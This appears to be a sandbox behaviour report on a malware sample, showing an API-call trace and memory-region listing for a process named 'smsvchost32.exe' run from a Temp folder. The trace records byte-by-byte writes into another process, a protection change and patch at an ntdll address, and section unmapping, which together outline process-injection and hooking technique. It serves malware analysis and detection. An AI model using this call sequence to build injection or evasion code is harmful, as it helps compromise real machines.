	[0070.713] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700005, lpBuffer=0x2d0fe19*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe19*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.714] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700006, lpBuffer=0x2d0fe1a*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1a*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.714] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700007, lpBuffer=0x2d0fe1b*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1b*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.714] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700008, lpBuffer=0x2d0fe1c*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1c*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.714] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700009, lpBuffer=0x2d0fe1d*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1d*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.715] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70000a, lpBuffer=0x2d0fe1e*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1e*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.715] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70000b, lpBuffer=0x2d0fe1f*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1f*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.715] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70000c, lpBuffer=0x2d0fe20*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe20*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.715] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70000d, lpBuffer=0x2d0fe21*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe21*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.715] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70000e, lpBuffer=0x2d0fe22*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe22*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.716] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70000f, lpBuffer=0x2d0fe23*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe23*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.716] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700010, lpBuffer=0x2d0fe24*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe24*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.716] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700011, lpBuffer=0x2d0fe25*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe25*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.717] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700012, lpBuffer=0x2d0fe26*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe26*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.717] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700013, lpBuffer=0x2d0fe27*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe27*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.717] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700014, lpBuffer=0x2d0fe28*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe28*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.717] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700015, lpBuffer=0x2d0fe29*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe29*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.718] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700016, lpBuffer=0x2d0fe2a*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2a*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.718] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700017, lpBuffer=0x2d0fe2b*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2b*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.718] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700018, lpBuffer=0x2d0fe2c*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2c*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.718] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700019, lpBuffer=0x2d0fe2d*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2d*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.719] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70001a, lpBuffer=0x2d0fe2e*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2e*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.719] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70001b, lpBuffer=0x2d0fe2f*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2f*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.719] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70001c, lpBuffer=0x2d0fe30*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe30*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.719] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70001d, lpBuffer=0x2d0fe31*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe31*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.719] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70001e, lpBuffer=0x2d0fe32*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe32*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.720] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70001f, lpBuffer=0x2d0fe33*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe33*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.720] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700020, lpBuffer=0x2d0fe34*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe34*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.720] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700021, lpBuffer=0x2d0fe35*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe35*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.720] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700022, lpBuffer=0x2d0fe36*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe36*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.721] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700023, lpBuffer=0x2d0fe37*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe37*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.721] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700024, lpBuffer=0x2d0fe38*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe38*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.721] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700025, lpBuffer=0x2d0fe39*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe39*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.721] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700026, lpBuffer=0x2d0fe3a*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3a*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.722] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700027, lpBuffer=0x2d0fe3b*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3b*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.722] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700028, lpBuffer=0x2d0fe3c*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3c*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.722] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700029, lpBuffer=0x2d0fe3d*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3d*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.722] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70002a, lpBuffer=0x2d0fe3e*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3e*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.723] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70002b, lpBuffer=0x2d0fe3f*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3f*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.723] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70002c, lpBuffer=0x2d0fe40*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe40*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.723] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70002d, lpBuffer=0x2d0fe41*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe41*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.723] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70002e, lpBuffer=0x2d0fe42*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe42*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.723] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70002f, lpBuffer=0x2d0fe43*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe43*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.724] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700030, lpBuffer=0x2d0fe44*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe44*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.724] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700031, lpBuffer=0x2d0fe45*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe45*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.724] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700032, lpBuffer=0x2d0fe46*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe46*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.724] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700033, lpBuffer=0x2d0fe47*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe47*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.725] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700034, lpBuffer=0x2d0fe48*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe48*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.725] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700035, lpBuffer=0x2d0fe49*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe49*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.725] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700036, lpBuffer=0x2d0fe4a*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe4a*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.725] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700037, lpBuffer=0x2d0fe4b*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe4b*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.726] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700038, lpBuffer=0x2d0fe64*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe64*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.726] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700039, lpBuffer=0x2d0fe65*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe65*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.726] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70003a, lpBuffer=0x2d0fe66*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe66*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.726] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70003b, lpBuffer=0x2d0fe67*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe67*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.727] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x70003c, lpBuffer=0x2d0fe68*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe68*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.727] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x7782d9b0, dwSize=0x400, flNewProtect=0x40, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x20) returned 1
	[0070.727] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b0, lpBuffer=0x2d0fe64*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe64*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.727] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b1, lpBuffer=0x2d0fe65*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe65*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.727] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b2, lpBuffer=0x2d0fe66*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe66*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.728] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b3, lpBuffer=0x2d0fe67*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe67*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.728] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b4, lpBuffer=0x2d0fe68*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe68*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.728] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x7782d9b0, dwSize=0x400, flNewProtect=0x20, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x40) returned 1
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.728] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] GetLastError () returned 0x0
	[0070.729] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0070.730] GetProcAddress (hModule=0x77960000, lpProcName="NtUnmapViewOfSection") returned 0x779d6f40
	[0070.730] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x2bb0000) returned 0x0
	[0070.730] GetLastError () returned 0x0
	[0070.730] GetLastError () returned 0x0
	[0070.730] GetLastError () returned 0x0
	[0070.730] GetLastError () returned 0x0
	[0070.730] GetLastError () returned 0x0
	[0070.730] GetLastError () returned 0x0
	[0070.730] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.731] GetLastError () returned 0x0
	[0070.732] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.732] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0070.732] RtlNtStatusToDosError (Status=0x0) returned 0x0
	[0070.732] CloseHandle (hObject=0x220) returned 1
	[0070.732] CloseHandle (hObject=0x224) returned 1
	[0070.732] CloseHandle (hObject=0x0) returned 0

Thread:
	id = 72
	os_tid = 0xea0


Thread:
	id = 73
	os_tid = 0xeb4


Thread:
	id = 74
	os_tid = 0x748


Thread:
	id = 75
	os_tid = 0xd6c


Thread:
	id = 76
	os_tid = 0xbc0


Thread:
	id = 77
	os_tid = 0xcc4


Thread:
	id = 78
	os_tid = 0xe3c


Thread:
	id = 79
	os_tid = 0xd00


Process:
	id = "7"
	image_name = "smsvchost32.exe"
	filename = "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"
	page_root = "0x66658000"
	os_pid = "0xdb8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "6"
	os_parent_pid = "0xdb0"
	cmd_line = "C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 932
	        start_va = 0x10000
	          end_va = 0x2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 933
	        start_va = 0x30000
	          end_va = 0x31fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 934
	        start_va = 0x40000
	          end_va = 0x54fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000040000"
	        filename = ""

Region:
	              id = 935
	        start_va = 0x60000
	          end_va = 0x9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000060000"
	        filename = ""

Region:
	              id = 936
	        start_va = 0xa0000
	          end_va = 0x19ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000a0000"
	        filename = ""

Region:
	              id = 937
	        start_va = 0x1a0000
	          end_va = 0x1a3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 938
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 939
	        start_va = 0x200000
	          end_va = 0x3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 940
	        start_va = 0x400000
	          end_va = 0x43cfff
	     entry_point = 0x400000
	     region_type = mapped_file
	            name = "smsvchost32.exe"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")

Region:
	              id = 941
	        start_va = 0x77960000
	          end_va = 0x77adafff
	     entry_point = 0x77960000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 942
	        start_va = 0x7ffb0000
	          end_va = 0x7ffd2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ffb0000"
	        filename = ""

Region:
	              id = 943
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 944
	        start_va = 0x7fff0000
	          end_va = 0x7ffc1562ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 945
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 946
	        start_va = 0x7ffc157f1000
	          end_va = 0x7ffffffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffc157f1000"
	        filename = ""

Region:
	              id = 949
	        start_va = 0x1f0000
	          end_va = 0x1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001f0000"
	        filename = ""

Region:
	              id = 950
	        start_va = 0x55c00000
	          end_va = 0x55c79fff
	     entry_point = 0x55c00000
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 951
	        start_va = 0x55c90000
	          end_va = 0x55cdffff
	     entry_point = 0x55c90000
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 952
	        start_va = 0x55c80000
	          end_va = 0x55c87fff
	     entry_point = 0x55c80000
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 953
	        start_va = 0x10000
	          end_va = 0x1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 954
	        start_va = 0x4c0000
	          end_va = 0x5bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004c0000"
	        filename = ""

Region:
	              id = 955
	        start_va = 0x5c0000
	          end_va = 0x67dfff
	     entry_point = 0x5c0000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 956
	        start_va = 0x765a0000
	          end_va = 0x7667ffff
	     entry_point = 0x765a0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 957
	        start_va = 0x774c0000
	          end_va = 0x7763dfff
	     entry_point = 0x774c0000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 958
	        start_va = 0x7feb0000
	          end_va = 0x7ffaffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007feb0000"
	        filename = ""

Region:
	              id = 959
	        start_va = 0x440000
	          end_va = 0x47ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 960
	        start_va = 0x680000
	          end_va = 0x77ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000680000"
	        filename = ""

Region:
	              id = 961
	        start_va = 0x70010000
	          end_va = 0x70019fff
	     entry_point = 0x70010000
	     region_type = mapped_file
	            name = "cmpbk32.dll"
	        filename = "\\Windows\\SysWOW64\\cmpbk32.dll" (normalized: "c:\\windows\\syswow64\\cmpbk32.dll")

Region:
	              id = 962
	        start_va = 0x747c0000
	          end_va = 0x7487dfff
	     entry_point = 0x747c0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 963
	        start_va = 0x76f00000
	          end_va = 0x7704efff
	     entry_point = 0x76f00000
	     region_type = mapped_file
	            name = "gdi32.dll"
